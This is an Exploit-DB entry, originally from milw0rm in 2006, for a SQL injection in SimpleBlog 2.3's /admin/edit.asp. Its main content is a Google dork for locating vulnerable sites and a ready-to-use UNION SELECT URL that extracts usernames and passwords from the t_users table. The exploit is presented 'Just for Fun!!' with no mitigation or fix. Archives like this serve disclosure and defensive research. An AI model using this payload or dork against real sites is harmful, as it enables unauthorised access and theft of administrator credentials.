SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection

EDB-ID:

2853

Author:

bolivar

Type:

webapps

Platform:

ASP

Published:

2006-11-26

# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]